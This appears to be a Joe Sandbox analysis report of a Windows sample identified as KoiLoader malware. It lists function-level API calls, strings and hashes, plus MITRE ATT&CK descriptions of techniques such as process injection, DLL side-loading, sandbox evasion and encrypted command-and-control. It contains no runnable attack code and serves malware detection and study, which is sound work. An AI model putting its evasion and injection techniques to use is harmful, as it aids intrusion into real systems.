Opcode Fuzzy Hash: 0c3898e7da78fb2c8de14add3ec97ff90dda4321a0875b03f9acdc3de689b001
Instruction Fuzzy Hash: A411027220AF316FD79462F47C85EAF271BABC1B747280A2CF620832D2DF648C094D64

Function 00628481 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,006211AD,?,00628822,006285BF,?,?,006211AD,?), ref: 00628486
_free.LIBCMT ref: 006284E3
_free.LIBCMT ref: 00628519
SetLastError.KERNEL32(00000000,00000005,000000FF,?,006211AD,?,00628822,006285BF,?,?,006211AD,?), ref: 00628524

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 072fcdc39f0b25396fea0087a73baa035ae33cb24099a0d0fd93743b44b458a8
Instruction ID: c33cff24ffd9bfba6ed267d631bd863ae9fd9de5710a706aab81169c3add112b
Opcode Fuzzy Hash: 072fcdc39f0b25396fea0087a73baa035ae33cb24099a0d0fd93743b44b458a8
Instruction Fuzzy Hash: E7114872209F212FD79073B4BC85EAB279B9BC13747280238F520972D2DF648C054E75

Function 0062D4D6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,0062CF35,?,00000001,?,00000001,?,0062C3CF,?,?,00000001), ref: 0062D4ED
GetLastError.KERNEL32(?,0062CF35,?,00000001,?,00000001,?,0062C3CF,?,?,00000001,?,00000001,?,0062C91B,0062AD05), ref: 0062D4F9

Part of subcall function 0062D4BF: CloseHandle.KERNEL32(FFFFFFFE,0062D509,?,0062CF35,?,00000001,?,00000001,?,0062C3CF,?,?,00000001,?,00000001), ref: 0062D4CF

___initconout.LIBCMT ref: 0062D509

Part of subcall function 0062D481: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0062D4B0,0062CF22,00000001,?,0062C3CF,?,?,00000001,?), ref: 0062D494

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,0062CF35,?,00000001,?,00000001,?,0062C3CF,?,?,00000001,?), ref: 0062D51E

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: af0e19c5fb83486f7d4b8fcc47d99f4b3f14f2b2335377227a54eeb919fe0b01
Instruction ID: ce0abfca44d0d8b2a95ef6173d50f8a54e46aa7c7af3bb42c2169f496a115391
Opcode Fuzzy Hash: af0e19c5fb83486f7d4b8fcc47d99f4b3f14f2b2335377227a54eeb919fe0b01
Instruction Fuzzy Hash: 44F01C36411668BFCF222F91EC08AC93FA7FB093E4B044014FA1896120CB328860DBD4

Function 00627C6B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00627C74

Part of subcall function 00627FB2: HeapFree.KERNEL32(00000000,00000000,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?), ref: 00627FC8
Part of subcall function 00627FB2: GetLastError.KERNEL32(?,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?,?), ref: 00627FDA

_free.LIBCMT ref: 00627C87
_free.LIBCMT ref: 00627C98
_free.LIBCMT ref: 00627CA9

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ccee2ed8e227aa3ce475482f181df98c6988c0b37052dd9ebc23b3d533e323f3
Instruction ID: a234a13cfa0e54cb8a8382b48c96cbfb7b9ceb5d455c76b3ef1ffd2c67da5400
Opcode Fuzzy Hash: ccee2ed8e227aa3ce475482f181df98c6988c0b37052dd9ebc23b3d533e323f3
Instruction Fuzzy Hash: DFE08C7080C9749A8B522F20BD4988A7FA7E708710742700AF86022333C7F118979FF8

Function 00625780 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 006257A5

Strings

MOC, xrefs: 006257B7
RCC, xrefs: 006257BF

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 06323140100620bf35e995a8781f27f7c4623409fdfe24bfd4b87a42f9d4f76a
Instruction ID: b6dff2ed26cae04277d867016eebcffd2269114923b44b99e2c3f1f0a64a10b2
Opcode Fuzzy Hash: 06323140100620bf35e995a8781f27f7c4623409fdfe24bfd4b87a42f9d4f76a
Instruction Fuzzy Hash: F2417871900A29EFCF25DF94EC81AEEBBB6BF48300F188099F906A6251D3799950CF51

Function 00621110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 0062111B
GetModuleHandleW.KERNEL32(00000000), ref: 00621162

Strings

kernel32, xrefs: 00621116

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: HandleModule
String ID: kernel32
API String ID: 4139908857-541877477
Opcode ID: 7f5be8da15e10b06011a65c865f2892f6e1e8f73896fadeb6f8b562da29240d8
Instruction ID: 42a775b9f03255bf585adb13e14f505069eeb18d764f4ee2ab4d7cf4dcd40fda
Opcode Fuzzy Hash: 7f5be8da15e10b06011a65c865f2892f6e1e8f73896fadeb6f8b562da29240d8
Instruction Fuzzy Hash: 7A21F5B9D0061DEFCB04DFE4D849AEEBBB5AF49305F108558E905AB340E7349A40CFA1

Function 00623680 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

_Max_value.LIBCPMTD ref: 006236B6
_Min_value.LIBCPMTD ref: 006236DC

Strings

[4b, xrefs: 006236E6

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: Max_valueMin_value
String ID: [4b
API String ID: 3846992165-2269047744
Opcode ID: 8d8c36d3c597d4c958e84837b90c9a0a4b6218c908e01e2a44502771170faa6f
Instruction ID: 4a40c189508b00c4a3f8bf956c6f37d5fcd86bce6f15e14b8d6c3bdbc82436d6
Opcode Fuzzy Hash: 8d8c36d3c597d4c958e84837b90c9a0a4b6218c908e01e2a44502771170faa6f
Instruction Fuzzy Hash: 3E012CB5D006199FCB44EFA4E9429EEBBB5AF08300F00456DE505AB301EB38A704CF95

Function 00622A60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00623040: char_traits.LIBCPMTD ref: 00623080

task.LIBCPMTD ref: 00622AB3
task.LIBCPMTD ref: 00622AC2

Strings

dboupzalsfzwvwpyqdpu, xrefs: 00622A96

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: task$char_traits
String ID: dboupzalsfzwvwpyqdpu
API String ID: 1455298312-2047172133
Opcode ID: 72b55690d93d55b6c843b4d705295199e9b2bc39724aea8d66dc24471231e1c9
Instruction ID: 0d7ecb3af544f3aeb1c2f11e8942f6c522fdd2d392f7df92fbbed5eb61a5c182
Opcode Fuzzy Hash: 72b55690d93d55b6c843b4d705295199e9b2bc39724aea8d66dc24471231e1c9
Instruction Fuzzy Hash: C9016971904658EBCB04DF58E951B9EBBB5FB04720F10866DF820A77C0DB796B04CB94

Function 006229F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00623040: char_traits.LIBCPMTD ref: 00623080

task.LIBCPMTD ref: 00622A43

Strings

S, xrefs: 00622A24
oeislvoodubcwjonjrwnhbjfxmsna, xrefs: 00622A07

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: char_traitstask
String ID: S$oeislvoodubcwjonjrwnhbjfxmsna
API String ID: 3039116899-104439280
Opcode ID: 5d3bb90079fb6cbe8d6ddd32825769698df2a81a8525a90820bb562a73e71ce5
Instruction ID: 3f4d58c3de46e66cb383c184fec8d73ee5a53adc5d3c52f448b6a6035a2be5f2
Opcode Fuzzy Hash: 5d3bb90079fb6cbe8d6ddd32825769698df2a81a8525a90820bb562a73e71ce5
Instruction Fuzzy Hash: 48F06270D046199BDB18DFA8E6657EDB7B1EB08304F10406DD40277381DB799E08DF69

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report tcmeimnnMZ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: KoiLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: tcmeimnnMZ.exePID: 7432, Parent PID: 2580

General

Windows Analysis Report
tcmeimnnMZ.exe

Function 00E48660 Relevance: 212.4, APIs: 77, Strings: 44, Instructions: 610
libraryloaderCOMMON

Function 00621300 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 297
librarymemoryloaderCOMMON

Function 00622F40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43
timeCOMMON

Function 00E48E60 Relevance: 3.0, APIs: 2, Instructions: 49
COMMON

Function 00621710 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Function 00E46C00 Relevance: 70.4, APIs: 31, Strings: 9, Instructions: 426
memorycomCOMMON

Function 00E45EB0 Relevance: 68.6, APIs: 30, Strings: 9, Instructions: 309
libraryfileloaderCOMMON

Function 00E466E0 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 230
memorynetworkfileCOMMON

Function 00E45B30 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 285
injectionthreadprocessCOMMON

Function 00E48356 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 182
sleepencryptionfileCOMMON

Function 00E47690 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 174
memoryCOMMON

Function 00E478A0 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 434
memorystringCOMMON

Function 00E47D90 Relevance: 61.6, APIs: 21, Strings: 14, Instructions: 350
libraryloadersleepCOMMON

Function 00622AE0 Relevance: 37.0, APIs: 3, Strings: 18, Instructions: 276
COMMON